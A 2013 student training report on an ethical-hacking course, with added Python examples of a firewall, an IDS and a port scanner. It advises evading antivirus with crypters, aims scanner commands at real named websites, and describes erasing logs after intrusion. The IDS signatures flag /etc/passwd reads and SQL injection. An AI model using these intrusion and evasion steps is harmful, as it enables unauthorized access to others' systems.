Report On Topic: Raghav Bisht 7/16/2013

2013

Report On Topic

Raghav Bisht
7/16/2013
SEMINAR ON INDUSTRIAL TRAINING
(June-July, 2013)

Certified Ethical Hacker


(CEH)

Submitted by

Raghav Bisht

Under the Guidance of

Mr. Mohit Yadav


(Co-Founder & Managing Director)

Discipline of CSE/IT

Bharath University, Agharam Road Selaiyur, Chennai

June-July, 2013
DECLARATION

I hereby declare that I have completed my six weeks summer training at Bytec0de Securities
PVT. LTD from 25th May 2013 to 25th July 2013 under the guidance of Mr. Mohit Yadav. I
have worked with full dedication during these six weeks and my learning outcomes fulfill the
requirements of training.

Name of Student: Raghav Bisht


Date: 7/16/2013
Acknowledgement

“TO MY NATION INDIA AND LOVING GOD”

I am happy to present this report to my Department of CSE/IT.

I would like to acknowledge my trainer Mr. Mohit Yadav, who gave me the opportunity to develop
my hacking skills under his roof, and all the other hackers who appreciated my work and
supported me until the end of my training.

A special thanks to Mr. Shorty420 & p7771 (Black hat) for sharing their work experience and
knowledge with me.

I wish to thank my family and friends. Without them, I could not have completed my training.

I would also like to thank the people who directly or indirectly helped me on this term paper.

THANKING YOU
Index

 Organization overview
 Training Objective
 Course Outline
 Introduction to hacking and security
 Ethical hacking and IT security
 Technology aspects for IT security & ethical hacking
 Steps of hacking
 DoS & DDoS attacks
 Wireless hacking
 SQL Injection
 Malware
 Penetration testing
 Metasploit
 Reason for choosing CEH
 Gantt chart
 Bibliography
Organization Overview

Bytecode is an IT certification and training company and an authorized/accredited training center
of EC-Council, headquartered in New Delhi (INDIA). They started small IT training and
certification operations on 1 February 2008 with a virtual lab environment and online training,
and in just a few years Bytecode has grown with a large number of new students, clients and
partners, having trained and certified more than 15000 (fifteen thousand) students across the
world.

From the start they have delivered only the best quality, knowledge-based solutions to a very
high standard for their students, clients and partners. Bytecode believes in teamwork; with every
new day the quest for acquiring new competencies continues. Searching, experimenting,
innovating, learning, moving ahead with sincere effort and dedication, shaping the future, and
challenging competencies to create new opportunities is a never-ending process in the company.

They have successfully delivered training and workshop services to government departments,
corporations, institutions and other large Indian engineering colleges and schools.

They provide certification and training services for vendors such as:

 EC-Council: Security5, CEH v8, ECSA, LPT, CHFI, CEI, ENSA
 CISCO: CCNA, CCNP, CCVP, CCSP, CCIE
 Redhat: RHCE, RHCA, RHCSA, RHCVA, RHCSS, RHCDS
 CompTIA: Security+, A+, N+, Server+, Linux+, CASP, CTP
 CHECKPOINT: CCSA, CCSE
 ISACA: CISM, CISA
 ISC2: CISSP
 Microsoft: MCSE, MCSA, MCTS, MCITP, MCPD

Location:

Bytecode Cyber Security (P) Limited

Head Quarter : 72-B, III Floor,

Main Vikas Marg, Laxmi Nagar,

New Delhi - 110092

Near Nirman Vihar Metro Station ( Opp. Metro Pillar No.50 )


Training Objective

 Importance of information security in today’s world.
 Elements of security.
 Various phases of the Hacking Cycle.
 Types of hacker attacks.
 Hacktivism.
 Ethical hacking.
 Vulnerability research and tools.
 Steps for conducting ethical hacking.
 Computer crimes and implications.
Course Outline

1. Introduction to Ethical Hacking
2. Footprinting
3. Scanning
4. Enumeration
5. System Hacking
6. Trojans and Backdoors
7. Sniffers
8. Denial of Service
9. Social Engineering
10. Session Hijacking
11. Hacking Web Servers
12. Web Application Vulnerabilities
13. Web-based Password Cracking Techniques
14. SQL Injection
15. Hacking Wireless Networks
16. Virus and Worms
17. Physical Security
18. Linux Hacking
19. Evading IDS, Firewalls, and Honey-pots
20. Buffer Overflows
21. Cryptography
22. Penetration Testing
Introduction to Hacking & Security

1. What is hacking?
Hacking is the process of bypassing the security mechanisms of an information system or
network. It is done step by step, partly through creative thinking and partly by using
different tools together.
Or:
Hacking is the unauthorized use of computer and network resources. Most people think that
hackers are computer criminals; they fail to recognize that criminals and hackers are two
entirely different things, and the media is largely responsible for this confusion.
Hackers in reality are skilled and highly knowledgeable people who, by using their
knowledge constructively, help organizations, companies, governments, etc. to secure
their documents and confidential information on the internet.
So hackers, as popularly defined, are computer experts who spend enormous amounts of
time trying to breach the security of networks, web servers and e-mail systems. They
usually use a selection of specialist software to identify weaknesses, which are then
exploited.
The majority do it for fun and as a challenge. They are not interested in attacking
private individuals; it is the big companies and authorities they go for.
There are just two aspects of hacking that you have to worry about as a private
individual. One is that your details are held in various company databases, and when
those databases are breached, information about you can be stolen.

2. Understanding the need to hack your own systems
To catch a thief, think like a thief. That is the basis of ethical hacking. The law of
averages works against security: with the growing number and expanding knowledge of
attackers, combined with the growing number of system vulnerabilities and other unknowns,
the time will come when every computer system is hacked or compromised in some way.

3. Our overall goals as an ethical hacker should therefore be:

 Hack your systems in a nondestructive fashion.
 Enumerate vulnerabilities and, if necessary, prove to management that the
vulnerabilities exist and can be exploited.
 Apply the results to remove the vulnerabilities and better secure your systems.

4. What is computer security?

Security is a process, not a product. The objective of computer security is to protect
information and property from theft, corruption or natural disaster, while keeping that
information and property accessible and productive to its intended users, so that
security threats are minimized.

5. What can a hacker do?

 Enter a remote system and extract its information, often leaving little or no
trace.
 Compromise e-mail accounts and websites, and take a network down with the help of
a DDoS attack.
 Crack passwords (any weakly chosen or poorly stored password is at risk).
 Place phone calls that are hard to trace back (for example by spoofing the caller ID).
Ethical Hacking & IT Security

Ethical hacking and IT security requirements differ from person to person. A normal
computer user wants to protect their information from viruses and the like, while a
student may want to break into a friend’s e-mail account, a teacher’s account or other
valuable information as suits his needs.
System administrators want to keep information safe from outside and inside attacks, and
to maintain logs so that an attack can be investigated.
A businessman wants to protect his information from outside and inside attacks; some
businessmen are also interested in intelligence on competitors for business advantage.
Further interests are:
1. To protect the sensitive information in the company’s database. A company’s
database will usually contain not just information about the company itself, but
also data about its clients and employees. So should malicious hackers be able to
breach the system, they could very well get their hands on information about a lot
of people in one go.
2. To protect the database itself. Malicious hackers may not just steal the
information in your system. To add insult to injury, they can also send malware
into your system that could corrupt it and wipe out everything in your database,
which means the company loses a lot of very important information.
3. To protect the business interests of the company. If the database of a company
is left unsecured and malicious hackers are able to gain access to the information
in it, the company can very well lose the respect of its clients, partners and the
business world.
A forensic analyst wants to investigate cyber cases and identify cyber criminals, so he
needs up-to-date technology to solve cases in minimum time, and penetration testers want
to find loopholes in software or network services so as to reduce risk.
A black hat hacker wants to steal TOP SECRET information from business and military
computers for various agendas. Today everything depends on information, whether for
national security or war plans; China, for instance, is widely reported to be interested
in stealing valuable information from the USA, India, South Korea, Japan, Thailand,
Vietnam and others.
1. IT acts / laws
Each country has its own cyber law to prevent, monitor and investigate cyber crime.
Nowadays cyber criminals understand the complexity of these laws and their effects.
Some countries also apply tight controls at the gateway level using their own central
monitoring systems, for example China, Russia and India.

India:
India does not have any “lawful interception law”. All it has are the
“unconstitutional” provisions of the Information Technology Act 2000 (as amended by
the IT Amendment Act 2008). Through these amendments the cyber law of India has been
made an “instrumentality” of e-surveillance in India. There are no procedural
safeguards that can prevent illegal and unconstitutional e-surveillance activities in
India.
The only recourse for Indians in such circumstances is “self defense”: preventing the
illegal and unconstitutional encroachment upon their “civil liberties”, such as the
right to privacy, themselves. You can do the following:
1. Use disposable e-mail addresses to avoid e-mail surveillance.
2. Use safeguards like Tor against illegal internet eavesdropping and sniffing.
3. Use Tor for instant messaging, and mobile phones for private and secure
conversation.
4. For BlackBerry users, and anyone who wants a good combination of privacy and
security, use Pretty Good Privacy (PGP) along with any good smartphone. This gives
a better, e-surveillance-free mobile infrastructure than the controversial
BlackBerry phones.
5. Use Enigmail for encrypted e-mail.

Recently the United Nations has described the “right to access” the internet as a human
right. This would have a positive impact on many human rights in cyberspace: for
instance, the right to speech and expression, the right to privacy and the right to
know cannot be violated by the CMS (Central Monitoring System) project of India. The
United Nations must extend human rights protection to many more issues.
This is the real problem for the CMS project of India. We have no dedicated privacy
law, data security law or data protection law in India. Further, the CMS project of
India is also beyond “parliamentary scrutiny”. The cyber law of India, incorporated in
the Information Technology Act 2000, was drastically amended by the Information
Technology Amendment Act 2008.
The 2008 amendments incorporated various “unconstitutional provisions” into the cyber
law of India that clearly violate human rights in cyberspace. For instance, the
provisions regarding internet censorship, website blocking, encryption and decryption
have no built-in “procedural safeguards” as mandated by the Constitution of India. This
is why the cyber law of India needs to be repealed.
Further, we have no e-surveillance policy in India. Even phone tapping in India is done
in an “unconstitutional manner”, and even by private individuals with or without
governmental approval.
If the CMS project of India is to be “legal and constitutional” it must be subject to
“parliamentary oversight”. Further, the IT Act 2000 must be repealed as soon as
possible, as it is clearly not in conformity with the Constitution of India and the
protection of civil liberties in cyberspace.
China:
The Golden Shield Project, colloquially referred to as the Great Firewall of China, is
a censorship and surveillance project operated by the Ministry of Public Security of
the government of the People’s Republic of China. The project was initiated in 1998
and began operations in November 2003.
“Individuals are prohibited from using the internet to: harm national security;
disclose state secrets; or injure the interests of the state or society. Users are
prohibited from using the internet to create, replicate, retrieve, or transmit
information that incites resistance to the PRC Constitution, laws, or administrative
regulations; promotes the overthrow of the government or socialist system; undermines
national unification; distorts the truth, spreads rumors, or destroys social order; or
provides sexually suggestive material or encourages gambling, violence, or murder.
Users are prohibited from engaging in activities that harm the security of computer
information networks and from using networks or changing network resources without
prior approval.”
The purpose of the project is to block content by preventing certain IP addresses from
being routed through; it consists of standard firewalls and proxy servers at the
internet gateways. Through DNS cache poisoning it is also possible to make specific
websites unreachable when they are requested.
In October 2001, Greg Walton of the International Centre for Human Rights and
Democratic Development published a report in which he wrote:

“Old style censorship is being replaced with a massive, ubiquitous architecture of
surveillance: the Golden Shield. Ultimately, the aim is to integrate a gigantic online
database with an all-encompassing surveillance network, incorporating speech and face
recognition, closed-circuit television, smart cards, credit records, and Internet
surveillance technologies.”
China has implemented the most sophisticated internet content filtering, able to filter
content effectively using multiple methods of regulation and technical controls:

1. IP blocking and content filtering
2. DNS and URL filtering
3. DNS poisoning
This is a real battle in cyberspace, involving the world’s largest online population,
and the weapon created by the Chinese government is advanced internet censorship. The
censored content can be categorized as:
1. Websites belonging to outlawed or suppressed groups
2. Sites related to hostile governments, media or other organizations deemed
subversive
3. Sites with religious content, pornography sites, or sites that encourage
criminal activity
4. Blogging sites
The Chinese model is a reference for other authoritarian regimes, but not only for
them. We are witnessing a challenge by governments worldwide, the USA included, that
wish to legislate cyberspace and impose their control to prevent any form of terrorism
and dissent. There is a growing trend toward internet censorship in a range of
countries that are investing in the technology needed to implement the controls. The
technologies are exactly the same as those used to secure network infrastructure from
attack.
Some commonly used technical methods for censoring are:

1. IP blocking
IP blocking is a control used on mail, web or any other internet servers to block
connections from a specific IP address or range of addresses that are considered
undesirable or hostile. For example, a website forum administrator who sees spam or
unwanted posts from a user may block that user’s IP address to prevent them from using
the discussion board.
Blacklist: in internet terminology, a generic name for a list of e-mail addresses or
IP addresses that originate from known spammers. Individuals and enterprises can use
blacklists to filter out unwanted e-mail, as most e-mail applications today have
filtering capabilities.

2. DNS filtering and redirection

The resolver does not resolve certain domain names, or returns incorrect IP addresses
for them. This affects all IP protocols such as HTTP, FTP or POP. A typical
circumvention method is to find a domain name server that resolves names correctly,
but such servers are subject to blocking as well, especially IP blocking. Another
workaround is to bypass DNS altogether if the IP address can be obtained from another
source and is not itself blocked, for example by modifying the hosts file or typing
the IP address instead of the domain name into the web browser.
3. URL filtering
Suppose you type the name of your favourite social networking site into the web
browser and it displays a message like “The policy of this organization doesn’t
allow you to browse that website” and does not let you access the site from the
office: a URL filter has been put in place by your IT department.
A URL filter categorizes the websites on the internet and either allows or blocks
access to them for the web users of the organization, either by referring to an
already categorized central database (maintained by URL filtering vendors) or by
classifying the websites in real time. URL filtering can also be made applicable only
during certain times of day or days of the week, if required.
Why is URL filtering required?
URL filtering is used to stop the users of an organization from accessing, during
working hours, websites that:

 drain their productivity,
 let them view objectionable content from the workplace, or
 are bandwidth intensive and hence put a strain on resources.
4. Packet filtering
On the internet, packet filtering is the process of passing or blocking packets at a
network interface based on source and destination addresses, ports or protocols. The
process is often used in conjunction with packet mangling and Network Address
Translation (NAT). Packet filtering is usually part of a firewall that protects a
local network from unwanted intrusion. In a software firewall, packet filtering is
done by a program called a packet filter. The packet filter examines the header of
each packet against a specific set of rules and, on that basis, decides to prevent it
from passing (DROP) or allow it through (ACCEPT).
Technology aspects for IT security & ethical hacking

Story:
“In a real war a soldier must understand all weapons and their timing and effect on
the target in order to win the war in minimum time.”
Likewise, in IT security and ethical hacking we need to understand, and be able to
get past, antivirus, firewalls, IDS and IPS for penetration testing or ethical hacking.

1. Antivirus
Effective antivirus software guards your computer against many forms of malware,
including traditional computer viruses, worms, Trojan horses and even sophisticated,
blended attacks. Not only does antivirus software detect and remove viruses or malware
that may already have infected your hard drive; many solutions, including those that
offer a free virus scan, actively prevent new infections before they have a chance to
affect your computer. Antivirus software scans and analyzes e-mails and files for
infection as they are downloaded.
Using signature-based detection, antivirus software checks a file’s contents against a
dictionary of known virus signatures, a pattern of bytes that uniquely identifies a
virus. If a virus signature is found, the antivirus software removes the threat.
Antivirus software thus detects potential threats in a few different ways. But what
about the latest viruses? Because people create new viruses every day, an antivirus
program constantly updates its dictionary of virus signatures. Many antivirus programs,
including those that offer free virus protection, also employ heuristic analysis, which
can identify variants of known malware: viruses that have been mutated or refined by
attackers to create different strains.

How does antivirus work?

Before understanding how antivirus works, we first need to understand how a program
runs on a computer OS.
Each program is code, a sequence of instructions that processes inputs and outputs.
The final form of the code is binary (zeros and ones).
An antivirus company builds a team that collects known RATs and virus builders,
generates executables with them, and finds the part of each executable that is always
the same for that program. From these the company builds a signature database, which
the antivirus engine uses to block known viruses.
For unknown samples, antivirus uses behaviour patterns: it checks behaviour such as
file modification dates, installation location, visibility of the file, and so on,
and blocks according to a rating system. Norton SONAR is a good example.

How is antivirus bypassed?

To bypass antivirus we either build a new RAT or virus from our own code, or modify
existing code using crypters, binders, packers, etc. so that its bytes no longer match
the stored signature.
2. Firewall
The firewall is the second layer of the IT security pyramid; it blocks unauthorized or
unwanted communication between computer networks or hosts.
A firewall is a set of related programs, located at a network gateway server, that
protects the resources of a private network from users on other networks. (The term
also covers the security policy used with those programs.) An enterprise with an
intranet that allows its workers access to the wider internet installs a firewall to
prevent outsiders from accessing its own private data resources and to control what
outside resources its own users may reach.
Basically, a firewall, working closely with a router, examines each network packet to
determine whether to forward it toward its destination. A firewall often also includes
or works with a proxy server that makes network requests on behalf of workstation
users. A firewall is commonly installed on a specially designated computer separate
from the rest of the network so that no incoming request can reach private network
resources directly.
There are a number of firewall screening methods. A simple one is to screen requests
to make sure they come from acceptable (previously identified) domain names and
Internet Protocol addresses. For mobile users, firewalls allow remote access into the
private network through secure logon procedures and authentication certificates.
A number of companies make firewall products. Features include logging and reporting,
automatic alarms at given thresholds of attack, and a graphical user interface for
controlling the firewall.
Computer security borrows the term from firefighting, where a firewall is a barrier
built to prevent the spread of fire.

What does a firewall do?

A firewall filters both inbound and outbound traffic. It can also manage public access
to private networked resources such as host applications. It can log all attempts to
enter the private network and trigger alarms when hostile or unauthorized entry is
attempted. A firewall can filter packets based on their source and destination
addresses and port numbers; this is known as address filtering. It can also filter
specific types of network traffic; this is known as protocol filtering because the
decision to forward or reject traffic depends on the protocol used, for example HTTP,
FTP or telnet. Firewalls can also filter traffic by packet attribute or connection
state.
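The address, port/protocol and state filtering described here, and the DROP/ACCEPT rule evaluation of the packet-filtering section earlier, come together in the following stateful filter. It is an added example written for this page, not code from the report or from any firewall product; the packets, the 10.0.0.10 web server and the three-rule policy are constructed for illustration. Rules are matched in order, first match wins, and anything unmatched falls to the default DROP policy. The connection-tracking table is what turns a plain packet filter into a stateful one: a reply to an accepted connection is ESTABLISHED and passes, while a stray TCP packet that belongs to no tracked connection (for example an ACK-scan probe) is INVALID and is dropped even though its port would otherwise be allowed.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional

@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str            # "tcp", "udp" or "icmp"
    sport: int = 0
    dport: int = 0
    syn: bool = False     # TCP flags; a SYN without ACK opens a connection
    ack: bool = False

@dataclass
class Rule:
    action: str                   # "ACCEPT" or "DROP"
    proto: Optional[str] = None
    src: Optional[str] = None     # CIDR, e.g. "10.0.0.0/8"
    dst: Optional[str] = None
    dport: Optional[int] = None
    state: Optional[str] = None   # "NEW" or "ESTABLISHED"

class StatefulFilter:
    """Rules are tried in order, first match wins; no match -> default policy."""

    def __init__(self, rules, default="DROP"):
        self.rules = list(rules)
        self.default = default
        self.conntrack = set()      # 5-tuples of accepted NEW packets

    @staticmethod
    def _key(p):
        return (p.proto, p.src, p.sport, p.dst, p.dport)

    def _state(self, p):
        fwd = self._key(p)
        rev = (p.proto, p.dst, p.dport, p.src, p.sport)
        if fwd in self.conntrack or rev in self.conntrack:
            return "ESTABLISHED"
        if p.proto == "tcp" and not (p.syn and not p.ack):
            return "INVALID"        # non-SYN TCP with no tracked connection
        return "NEW"

    def _matches(self, r, p, state):
        if r.proto is not None and r.proto != p.proto:
            return False
        if r.src is not None and ip_address(p.src) not in ip_network(r.src):
            return False
        if r.dst is not None and ip_address(p.dst) not in ip_network(r.dst):
            return False
        if r.dport is not None and r.dport != p.dport:
            return False
        if r.state is not None and r.state != state:
            return False
        return True

    def filter(self, p):
        state = self._state(p)
        verdict = self.default
        for r in self.rules:
            if self._matches(r, p, state):
                verdict = r.action
                break
        if verdict == "ACCEPT" and state == "NEW":
            self.conntrack.add(self._key(p))   # remember it so replies pass
        return verdict

# Hypothetical policy for a web server at 10.0.0.10: replies to anything we
# accepted, HTTP from anywhere, SSH only from the internal 10.0.0.0/8 range.
POLICY = [
    Rule("ACCEPT", state="ESTABLISHED"),
    Rule("ACCEPT", proto="tcp", dst="10.0.0.10/32", dport=80, state="NEW"),
    Rule("ACCEPT", proto="tcp", src="10.0.0.0/8", dst="10.0.0.10/32", dport=22, state="NEW"),
]

def run_demo():
    """Constructed packets in arrival order; returns the verdict for each."""
    fw = StatefulFilter(POLICY)
    pkts = [
        Packet("203.0.113.5", "10.0.0.10", "tcp", 51000, 80, syn=True),   # new HTTP
        Packet("10.0.0.10", "203.0.113.5", "tcp", 80, 51000, ack=True),   # its reply
        Packet("203.0.113.5", "10.0.0.10", "tcp", 51001, 22, syn=True),   # external SSH
        Packet("10.1.2.3", "10.0.0.10", "tcp", 40000, 22, syn=True),      # internal SSH
        Packet("203.0.113.5", "10.0.0.10", "tcp", 51002, 80, ack=True),   # ACK-scan probe
        Packet("203.0.113.5", "10.0.0.10", "udp", 51003, 53),             # no rule
    ]
    return [fw.filter(p) for p in pkts]

if __name__ == "__main__":
    print(run_demo())
```

The fifth packet is the one worth studying: port 80 is allowed, but without state tracking an ACK-only probe to it would be accepted and the scanner would learn the port is unfiltered. With the INVALID state it is dropped.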

3. IDS (Intrusion Detection System)

An intrusion detection system (IDS) monitors network traffic for suspicious activity
and alerts the system or network administrator. In some cases the IDS may also respond
to anomalous or malicious traffic by taking action such as blocking the user or source
IP address from accessing the network.
IDS come in a variety of “flavors” and approach the goal of detecting suspicious
traffic in different ways. There are network based (NIDS) and host based (HIDS)
intrusion detection systems. There are IDS that detect by looking for specific
signatures of known threats, similar to the way antivirus software typically detects
and protects against malware, and there are IDS that detect by comparing traffic
patterns against a baseline and looking for anomalies. There are IDS that simply
monitor and alert, and there are IDS that perform one or more actions in response to a
detected threat. We cover each of these briefly.
IDS are classified by where they sit and by how they detect:
1. NIDS (Network Intrusion Detection System)
Network Intrusion Detection Systems are placed at a strategic point or points within
the network to monitor traffic to and from all devices on the network. Ideally you
would inspect all inbound and outbound traffic; however, doing so might create a
bottleneck that impairs the overall speed of the network.

2. HIDS (Host-based Intrusion Detection System)

Host Intrusion Detection Systems run on individual hosts or devices on the network. A
HIDS monitors the inbound and outbound packets of that device only and alerts the user
or administrator if suspicious activity is detected.

3. Signature based

A signature based IDS monitors packets on the network and compares them against a
database of signatures or attributes of known malicious threats. This is similar to
the way most antivirus software detects malware. The issue is that there will be a lag
between a new threat being discovered in the wild and the signature for detecting that
threat being applied to your IDS. During that lag time your IDS is unable to detect
the new threat.

4. Anomaly Based
An IDS which is anomaly based will monitor network traffic and compare it
against an established baseline. The baseline will identify what is “normal” for that
network- what sort of bandwidth is generally used, what protocols are used, what
ports and devices generally connect to each other- and alert the administrator or
user when traffic is detected which is anomalous, or significantly different, than
the baseline.
5. IPS (Intrusion Prevention System)
Intrusion prevention is a preemptive approach to network security used to identify
potential threats and respond to them swiftly. Like an intrusion detection system
(IDS), an intrusion prevention system (IPS) monitors network traffic. However, because
an exploit may be carried out very quickly after the attacker gains access, intrusion
prevention systems also have the ability to take immediate action, based on a set of
rules established by the network administrator. For example, an IPS might drop a
packet that it determines to be malicious and block all further traffic from that IP
address or port. Legitimate traffic, meanwhile, should be forwarded to the recipient
with no apparent disruption or delay of service.
According to Michael Reed of Top Layer Networks, an effective intrusion prevention
system should also perform more complex monitoring and analysis, such as watching and
responding to traffic patterns as well as individual packets. "Detection mechanisms
can include address matching, HTTP string and substring matching, generic pattern
matching, TCP connection analysis, packet anomaly detection, traffic anomaly detection
and TCP/UDP port matching."
In the broadest sense, an intrusion prevention system can be said to include any
product or practice used to keep attackers from gaining access to your network, such
as firewalls and anti-virus software.
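The signature and anomaly approaches from the IDS section, and the inline blocking that distinguishes an IPS, can be exercised on a handful of request records. This is an added example for this page, not code from the report or from any IDS product; the baseline numbers, the flow records and the three signatures (path traversal, /etc/passwd, UNION SELECT) are constructed, and real sensors would derive the records from packets or web server logs. The same Sensor class runs in detect-only mode (IDS: every record is forwarded, alerts are raised) or prevent mode (IPS: the first match drops the record and puts its source on a block list, so the attacker's later, innocent-looking request is dropped too).

```python
import re
import statistics

# Signature rules: a name and a content pattern (HTTP string matching).
SIGNATURES = [
    ("path-traversal", re.compile(r"\.\./")),
    ("etc-passwd",     re.compile(r"/etc/passwd")),
    ("sqli-union",     re.compile(r"union\s+select", re.IGNORECASE)),
]

# Constructed baseline: bytes per request observed during a normal period.
BASELINE = [820, 1210, 960, 1130, 710, 1290, 905, 1010, 860, 1140, 990, 1070]

# Constructed flow records in arrival order.
TRAFFIC = [
    {"src": "10.0.0.21", "dst": "10.0.0.10", "dport": 80, "bytes": 940,
     "payload": "GET /index.html HTTP/1.1"},
    {"src": "203.0.113.9", "dst": "10.0.0.10", "dport": 80, "bytes": 1020,
     "payload": "GET /../../../../etc/passwd HTTP/1.1"},
    {"src": "203.0.113.9", "dst": "10.0.0.10", "dport": 80, "bytes": 880,
     "payload": "GET /about.html HTTP/1.1"},
    {"src": "198.51.100.4", "dst": "10.0.0.10", "dport": 80, "bytes": 1100,
     "payload": "GET /item?id=1 UNION SELECT user,password FROM users HTTP/1.1"},
    {"src": "198.51.100.7", "dst": "10.0.0.10", "dport": 80, "bytes": 250000,
     "payload": "POST /upload HTTP/1.1"},
]

class Sensor:
    """Signature matching plus a volume baseline (mean + sigma * stddev).
    With prevent=False it behaves as an IDS; with prevent=True as an IPS."""

    def __init__(self, baseline_bytes, sigma=3.0, prevent=False):
        self.mean = statistics.mean(baseline_bytes)
        self.std = statistics.pstdev(baseline_bytes)
        self.sigma = sigma
        self.prevent = prevent
        self.blocked = set()

    def inspect(self, rec):
        """Return (verdict, alerts) for one record."""
        if rec["src"] in self.blocked:
            return "DROP", ["blocked-source"]
        alerts = [f"sig:{name}" for name, pat in SIGNATURES
                  if pat.search(rec["payload"])]
        if rec["bytes"] > self.mean + self.sigma * self.std:
            alerts.append("anomaly:volume")
        if alerts and self.prevent:
            self.blocked.add(rec["src"])
            return "DROP", alerts
        return "ACCEPT", alerts

def run_sensor(prevent):
    """Run the constructed traffic through one sensor; returns
    (source, verdict, alerts) per record."""
    sensor = Sensor(BASELINE, prevent=prevent)
    return [(r["src"], *sensor.inspect(r)) for r in TRAFFIC]

if __name__ == "__main__":
    for mode in (False, True):
        print("IPS" if mode else "IDS")
        for row in run_sensor(mode):
            print("  ", row)
```

Note what the anomaly rule does and does not catch: the 250000-byte upload is flagged purely on volume with no signature at all (the new-threat lag the text mentions does not apply), while the injection attempts are small and only the signatures see them.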
Steps of Hacking

1. Information gathering
This is the first step of hacking and penetration testing; first we collect all the
information we can about the target, with tools and by manual means. Without enough
information the success rate of later attacks is low.
Manual process:
1. Get URLs using Google search.
2. Use whois sites:
 www.who.is
 www.robtex.com
 www.domaintools.com
3. Get PDFs and documents using Google’s advanced search operators:
 site:4share.com CISSP
 site:pastebin.com inurl:hack
 chemistry filetype:doc
 http://www.googleguide.com/advanced_operators_reference.html

Automated process:
1. Tools for information gathering:
 uberharvest
 theHarvester (theharvester.py)
 metagoofil
 Web data extractors (e-mail / phone number extractors)
 Maltego

2. People search:

 pipl.com
 anywho.com
 address.com
 Social networking sites (Facebook, LinkedIn, Twitter)
 Job sites [dice.com, monster.com, naukri.com]
3. Phone number

 truecaller.com
 kgdetective.com
 phunwa.com

4. Traceroute tools

 Vtrace [www.vtrace.pl]
 Trout [www.foundstone.com]
 tracert, traceroute [commands]

5. E-mail IP tracking
 wspy.org
 Emailtrackerpro.com
 Readnotify.com
 Politemail.com

2. Scanning & banner grabbing

After gathering information about the target we need to know the OS type and the
versions of the applications running on open ports, etc., for successful exploitation.
We use the following tools:
1. Port & network scanning:
Port and network scanning is used to discover open ports and live hosts on the network.
 Nmap
 Angry IP Scanner
 hping

2. Banner grabbing:
Banner grabbing is the process of learning the exact version of a target application
in order to search for known vulnerabilities, exploits or zero-days.
 Telnet
 ID Serve
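What Nmap and a telnet session do in the two steps above, a TCP connect scan followed by reading the service banner, is small enough to write out. This is an added example for this page, not code from the report or from Nmap; to keep it runnable offline it starts its own fake service on a loopback port that sends a constructed OpenSSH-style banner, and the banner patterns (SSH, HTTP Server header, SMTP/FTP 220 greeting) are the author's own rather than any tool's fingerprint database. The parsed product and version are exactly what you would take to an exploit or CVE search.

```python
import re
import socket
import threading

# Constructed banner for the fake service; a real sshd sends its own.
FAKE_BANNER = b"SSH-2.0-OpenSSH_6.2p2 Debian-6\r\n"

def start_fake_service(banner=FAKE_BANNER):
    """Listen on a free loopback port and send `banner` to every client, like a
    daemon that speaks first (SSH, SMTP, FTP). Returns (server_socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:          # server socket was closed
                return
            with conn:
                conn.sendall(banner)
    threading.Thread(target=serve, daemon=True).start()
    return srv, port

def closed_loopback_port():
    """Borrow and release a port number so we have one that is closed."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port

def tcp_connect_scan(host, ports, timeout=0.5):
    """Full-connect scan (nmap -sT): a completed handshake means open."""
    open_ports = []
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            open_ports.append(port)
        except OSError:              # refused (closed) or timed out (filtered)
            pass
        finally:
            s.close()
    return open_ports

def grab_banner(host, port, timeout=1.0, probe=b""):
    """Read whatever the service says first; send `probe` (e.g. an HTTP
    request) for services that wait for the client to speak."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if probe:
            s.sendall(probe)
        try:
            return s.recv(1024).decode("ascii", errors="replace").strip()
        except socket.timeout:
            return ""

BANNER_PATTERNS = [
    ("ssh", re.compile(r"^SSH-[\d.]+-(?P<product>[A-Za-z]+)[_ ](?P<version>\S+)")),
    ("http", re.compile(r"Server: (?P<product>[^/\r\n ]+)/?(?P<version>[^\r\n ]*)")),
    ("smtp", re.compile(r"^220 \S+ (?:ESMTP )?(?P<product>\S+)(?: (?P<version>\S+))?")),
]

def parse_banner(banner):
    """Reduce a raw banner to service / product / version."""
    for service, pat in BANNER_PATTERNS:
        m = pat.search(banner)
        if m:
            d = m.groupdict()
            return {"service": service, "product": d.get("product"),
                    "version": d.get("version") or None}
    return {"service": "unknown", "product": None, "version": None}

def scan_and_fingerprint(host, ports):
    """Open ports mapped to their parsed banners."""
    return {p: parse_banner(grab_banner(host, p)) for p in tcp_connect_scan(host, ports)}

if __name__ == "__main__":
    srv, port = start_fake_service()
    print(scan_and_fingerprint("127.0.0.1", [port, closed_loopback_port()]))
    srv.close()
```

A connect scan completes the handshake and is therefore logged by the target; Nmap's default SYN scan (-sS) sends only the SYN and needs raw sockets, which is why it requires root.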

3. Vulnerability scanning
This step is used to find loopholes in applications using tools; afterwards we use
public or private exploits to enter the target system remotely.
Vulnerability scanners:
 Acunetix
 Netsparker
 Nessus
 GFI LanGuard
 WhatWeb [identifies web application technologies] [BackTrack tool]
E.g.: ./whatweb bytec0de.com
 joomscan [scans Joomla websites] [/pentest/web/joomscan]
E.g.: ./joomscan.pl -u http://liclanka.com/
 Nikto:
E.g.: ./nikto.pl -host liclanka.com
 Websecurify
 Vega
 w3af
 webshag
After finding a vulnerability we look for an exploit; we may need to compile it with
its associated language and change the shellcode, if required, so that it connects
back to us.
4. Exploitation (obtaining access)
Program exploitation is a staple of hacking. A program is made up of a complex
set of rules following a certain execution flow that ultimately tells the computer
what to do. Exploiting a program is simply a clever way of getting the computer to
do what you want it to do, even if the currently running program was designed to
prevent that action. Since a program can really only do what it’s designed to do,
the security holes are actually flaws or oversights in the design of the program or
the environment the program is running in. It takes a creative mind to find these
holes and to write programs that compensate for them. Sometimes these holes are
the products of relatively obvious programmer errors, but there are some less
obvious errors that have given birth to more complex exploit techniques that can be
applied in many different places.

5. Maintaining access & erasing evidence

This is the post-exploitation phase, used to maintain future access to the target
system. We deploy malware according to our requirements, erase logs and other
evidence, and/or use an offshore VPS for the whole operation.
DoS & DDoS Attacks

1. DoS attack
